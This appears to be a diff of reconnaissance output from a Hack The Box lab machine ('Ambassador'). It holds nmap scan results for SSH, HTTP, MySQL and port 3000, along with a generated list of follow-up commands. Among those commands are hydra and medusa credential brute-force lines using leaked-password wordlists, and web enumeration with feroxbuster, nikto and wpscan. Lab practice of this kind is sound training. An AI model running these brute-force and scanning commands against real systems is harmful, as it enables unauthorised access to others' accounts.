| Salt: CQA;\x02((\x1DG(\x0E&BtT@27\x0B%
|_ Auth Plugin Name: caching_sha2_password
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%I=9%D=1/24%Time=63CFCDC5%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:23
SF::34\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tu
SF:e,\x2024\x20Jan\x202023\x2012:23:39\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(Hello,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20B
SF:ad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConne
SF:ction:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,6
SF:7,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x
SF:20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%
SF:r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(SSLv23SessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:28:24 2023 -- 1 IP address (1 host up) scanned in 335.34 seconds


@@ -0,0 +1,38 @@
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.10.11.183
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.10.11.183
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.10.11.183:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.10.11.183/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.10.11.183 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.10.11.183/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.10.11.183 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.10.11.183:80 2>&1 | tee "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.10.11.183:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_wpscan.txt"
[*] mysql on tcp/3306
[-] (sqsh) interactive database shell:
sqsh -U <username> -P <password> -S 10.10.11.183:3306


@@ -0,0 +1,2 @@
Identified HTTP Server: Apache/2.4.41 (Ubuntu)


@@ -0,0 +1,101 @@
# Nmap 7.93 scan initiated Tue Jan 24 07:22:49 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_quick_tcp_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.047s latency).
Scanned at 2023-01-24 07:22:49 EST for 294s
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)
| ssh-rsa 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
| 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=
| 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-generator: Hugo 0.94.2
|_http-title: Ambassador Development Server
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp? syn-ack
| fingerprint-strings:
| GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:22:57 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:23:02 GMT
|_ Content-Length: 0
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 43
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsLoadDataLocal, LongPassword, IgnoreSigpipes, SupportsTransactions, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, FoundRows, SupportsCompression, InteractiveClient, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongColumnFlag, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: \x01g1\x0D<8\x19#\x08@u6\x18S\x06VdJ\x0D[
|_ Auth Plugin Name: caching_sha2_password
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%I=9%D=1/24%Time=63CFCDA0%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:22
SF::57\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tu
SF:e,\x2024\x20Jan\x202023\x2012:23:02\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(Hello,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20B
SF:ad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConne
SF:ction:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,6
SF:7,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x
SF:20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%
SF:r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(SSLv23SessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:27:43 2023 -- 1 IP address (1 host up) scanned in 294.24 seconds


@@ -0,0 +1,62 @@
# Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.058s latency).
Scanned at 2023-01-24 07:27:44 EST for 1s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
|_banner: SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5
| ssh-hostkey:
| 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)
| ssh-rsa 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
| 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=
| 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W
| ssh2-enum-algos:
| kex_algorithms: (9)
| curve25519-sha256
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group16-sha512
| diffie-hellman-group18-sha512
| diffie-hellman-group14-sha256
| server_host_key_algorithms: (5)
| rsa-sha2-512
| rsa-sha2-256
| ssh-rsa
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| chacha20-poly1305@openssh.com
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.com
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:27:45 2023 -- 1 IP address (1 host up) scanned in 1.87 seconds


@@ -0,0 +1,100 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.183 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.183" start="1674563263" startstr="Tue Jan 24 07:27:43 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="connect" protocol="tcp" numservices="1" services="22"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674563263"/>
<taskend task="NSE" time="1674563263"/>
<taskbegin task="NSE" time="1674563263"/>
<taskend task="NSE" time="1674563263"/>
<taskbegin task="Connect Scan" time="1674563264"/>
<taskend task="Connect Scan" time="1674563264" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1674563264"/>
<taskend task="Service scan" time="1674563264" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1674563264"/>
<taskend task="NSE" time="1674563265"/>
<taskbegin task="NSE" time="1674563265"/>
<taskend task="NSE" time="1674563265"/>
<host starttime="1674563264" endtime="1674563265"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.183" addrtype="ipv4"/>
<hostnames>
<hostname name="ambassador.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="8.2p1 Ubuntu 4ubuntu0.5" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.2p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-auth-methods" output="&#xa; Supported authentication methods: &#xa; publickey&#xa; password"><table key="Supported authentication methods">
<elem>publickey</elem>
<elem>password</elem>
</table>
</script><script id="banner" output="SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5"/><script id="ssh-hostkey" output="&#xa; 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)&#xa;ssh-rsa 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&#xa; 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=&#xa; 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W"><table>
<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=</elem>
<elem key="fingerprint">29dd8ed7171e8e3090873cc651007c75</elem>
<elem key="bits">3072</elem>
<elem key="type">ssh-rsa</elem>
</table>
<table>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=</elem>
<elem key="fingerprint">80a4c52e9ab1ecda276439a408973bef</elem>
<elem key="bits">256</elem>
<elem key="type">ecdsa-sha2-nistp256</elem>
</table>
<table>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W</elem>
<elem key="fingerprint">f590ba7ded55cb7007f2bbc891931bf6</elem>
<elem key="bits">256</elem>
<elem key="type">ssh-ed25519</elem>
</table>
</script><script id="ssh2-enum-algos" output="&#xa; kex_algorithms: (9)&#xa; curve25519-sha256&#xa; curve25519-sha256@libssh.org&#xa; ecdh-sha2-nistp256&#xa; ecdh-sha2-nistp384&#xa; ecdh-sha2-nistp521&#xa; diffie-hellman-group-exchange-sha256&#xa; diffie-hellman-group16-sha512&#xa; diffie-hellman-group18-sha512&#xa; diffie-hellman-group14-sha256&#xa; server_host_key_algorithms: (5)&#xa; rsa-sha2-512&#xa; rsa-sha2-256&#xa; ssh-rsa&#xa; ecdsa-sha2-nistp256&#xa; ssh-ed25519&#xa; encryption_algorithms: (6)&#xa; chacha20-poly1305@openssh.com&#xa; aes128-ctr&#xa; aes192-ctr&#xa; aes256-ctr&#xa; aes128-gcm@openssh.com&#xa; aes256-gcm@openssh.com&#xa; mac_algorithms: (10)&#xa; umac-64-etm@openssh.com&#xa; umac-128-etm@openssh.com&#xa; hmac-sha2-256-etm@openssh.com&#xa; hmac-sha2-512-etm@openssh.com&#xa; hmac-sha1-etm@openssh.com&#xa; umac-64@openssh.com&#xa; umac-128@openssh.com&#xa; hmac-sha2-256&#xa; hmac-sha2-512&#xa; hmac-sha1&#xa; compression_algorithms: (2)&#xa; none&#xa; zlib@openssh.com"><table key="kex_algorithms">
<elem>curve25519-sha256</elem>
<elem>curve25519-sha256@libssh.org</elem>
<elem>ecdh-sha2-nistp256</elem>
<elem>ecdh-sha2-nistp384</elem>
<elem>ecdh-sha2-nistp521</elem>
<elem>diffie-hellman-group-exchange-sha256</elem>
<elem>diffie-hellman-group16-sha512</elem>
<elem>diffie-hellman-group18-sha512</elem>
<elem>diffie-hellman-group14-sha256</elem>
</table>
<table key="server_host_key_algorithms">
<elem>rsa-sha2-512</elem>
<elem>rsa-sha2-256</elem>
<elem>ssh-rsa</elem>
<elem>ecdsa-sha2-nistp256</elem>
<elem>ssh-ed25519</elem>
</table>
<table key="encryption_algorithms">
<elem>chacha20-poly1305@openssh.com</elem>
<elem>aes128-ctr</elem>
<elem>aes192-ctr</elem>
<elem>aes256-ctr</elem>
<elem>aes128-gcm@openssh.com</elem>
<elem>aes256-gcm@openssh.com</elem>
</table>
<table key="mac_algorithms">
<elem>umac-64-etm@openssh.com</elem>
<elem>umac-128-etm@openssh.com</elem>
<elem>hmac-sha2-256-etm@openssh.com</elem>
<elem>hmac-sha2-512-etm@openssh.com</elem>
<elem>hmac-sha1-etm@openssh.com</elem>
<elem>umac-64@openssh.com</elem>
<elem>umac-128@openssh.com</elem>
<elem>hmac-sha2-256</elem>
<elem>hmac-sha2-512</elem>
<elem>hmac-sha1</elem>
</table>
<table key="compression_algorithms">
<elem>none</elem>
<elem>zlib@openssh.com</elem>
</table>
</script></port>
</ports>
<times srtt="57850" rttvar="57850" to="289250"/>
</host>
<taskbegin task="NSE" time="1674563265"/>
<taskend task="NSE" time="1674563265"/>
<taskbegin task="NSE" time="1674563265"/>
<taskend task="NSE" time="1674563265"/>
<runstats><finished time="1674563265" timestr="Tue Jan 24 07:27:45 2023" summary="Nmap done at Tue Jan 24 07:27:45 2023; 1 IP address (1 host up) scanned in 1.87 seconds" elapsed="1.87" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>


@@ -0,0 +1,23 @@
# Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv --reason -Pn -T4 -sV -p 3306 "--script=banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/xml/tcp_3306_mysql_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.038s latency).
Scanned at 2023-01-24 07:27:44 EST for 108s
PORT STATE SERVICE REASON VERSION
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 61
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, LongPassword, ConnectWithDatabase, ODBCClient, SupportsTransactions, LongColumnFlag, FoundRows, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSigpipes, DontAllowDatabaseTableColumn, InteractiveClient, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: ; E\x18{q7/Y&NBxIZ\x132(&Y
|_ Auth Plugin Name: caching_sha2_password
| banner: [\x00\x00\x00\x0A8.0.30-0ubuntu0.20.04.2\x00?\x00\x00\x00"Rcm%P
| \x19Z\x00\xFF\xFF\xFF\x02\x00\xFF\xDF\x15\x00\x00\x00\x00\x00\x00\x00\x
|_00\x00\x009i1\,\x1C`P\x02g{+\x00caching_sha2_password\x00
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:29:32 2023 -- 1 IP address (1 host up) scanned in 108.73 seconds


@@ -0,0 +1,72 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 3306 &quot;-&#45;script=banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)&quot; -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/xml/tcp_3306_mysql_nmap.xml 10.10.11.183 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 3306 &quot;-&#45;script=banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)&quot; -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/xml/tcp_3306_mysql_nmap.xml 10.10.11.183" start="1674563263" startstr="Tue Jan 24 07:27:43 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="connect" protocol="tcp" numservices="1" services="3306"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674563264"/>
<taskend task="NSE" time="1674563264"/>
<taskbegin task="NSE" time="1674563264"/>
<taskend task="NSE" time="1674563264"/>
<taskbegin task="NSE" time="1674563264"/>
<taskend task="NSE" time="1674563264"/>
<taskbegin task="Connect Scan" time="1674563264"/>
<taskend task="Connect Scan" time="1674563264" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1674563264"/>
<taskend task="Service scan" time="1674563274" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1674563274"/>
<taskend task="NSE" time="1674563283"/>
<taskbegin task="NSE" time="1674563283"/>
<taskprogress task="NSE" time="1674563314" percent="66.67" remaining="16" etc="1674563329"/>
<taskprogress task="NSE" time="1674563344" percent="80.95" remaining="15" etc="1674563358"/>
<taskend task="NSE" time="1674563365"/>
<taskbegin task="NSE" time="1674563365"/>
<taskend task="NSE" time="1674563372"/>
<host starttime="1674563264" endtime="1674563372"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.183" addrtype="ipv4"/>
<hostnames>
<hostname name="ambassador.htb" type="PTR"/>
</hostnames>
